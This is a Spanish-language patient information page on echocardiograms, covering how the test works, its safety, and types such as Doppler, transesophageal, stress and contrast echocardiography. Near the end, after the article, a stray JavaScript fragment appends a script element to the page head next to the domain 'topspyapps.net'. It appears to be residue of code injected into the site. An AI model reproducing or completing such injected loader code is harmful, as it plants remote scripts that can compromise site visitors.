Ecocardiograma

ecocardiograma El Ecocardiograma es una prueba diagnóstica fundamental porque ofrece una imagen en movimiento del corazón. Mediante ultrasonidos, la ecocardiografía aporta información acerca de la forma, el tamaño y la fuerza del corazón, el movimiento y grosor de sus paredes y el funcionamiento de sus válvulas.

Cómo se realiza el ecocardiograma

Se aplica un gel conductor sobre el pecho del paciente. En esta zona se coloca un pequeño dispositivo que transmite la imagen del corazón a la ecocardiopantalla. La prueba suele durar entre 15 y 30 minutos.

El paciente

El paciente permanece tumbado y lo más tranquilo posible. El ecocardiograma no es doloroso ni produce ningún efecto secundario. Puede realizarse perfectamente a mujeres embarazadas sin ningún perjuicio para el bebé.

Tipos de ecocardiograma

Ecocardiografía doppler color

Consiste en visualizar el corazón y las válvulas cardiacas mediante ultrasonidos, proporcionando una información útil sobre su correcto funcionamiento. Es una prueba no invasiva y sin efectos secundarios.

Ecocardiograma transesofágico

Consiste en visualizar el corazón y las válvulas cardíacas por medio de los ultrasonidos, con una sonda colocada en el esófago.

Ecocardiograma de esfuerzo

Consiste en visualizar el corazón mientras se realiza un esfuerzo. Se utiliza con pacientes que no pueden someterse a ergometría convencional o para mejorar el rendimiento diagnóstico de ésta.

Ecocardiografía de estrés farmacológico

Consiste en visualizar el corazón con ultrasonidos mientras se administra una medicación que hace que el corazón trabaje con más rapidez e intensidad.

Ecocardiografía de contraste

Consiste en visualizar el corazón y las válvulas cardiacas mediante ultrasonidos. Se introduce, a través de una vena, un contraste especial que permite ver mucho mejor estructuras del corazón y los vasos sanguíneos.

 d.getElementsByTagName(‘head’)[0].appendChild(s);topspyapps.net

Compartir en...Share on FacebookPrint this pageEmail this to someoneTweet about this on TwitterShare on LinkedIn
Web Design BangladeshBangladesh Online Market